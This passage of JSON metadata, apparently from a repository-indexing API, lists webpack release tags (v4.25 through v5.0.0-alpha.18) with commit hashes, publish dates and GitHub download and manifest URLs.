/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com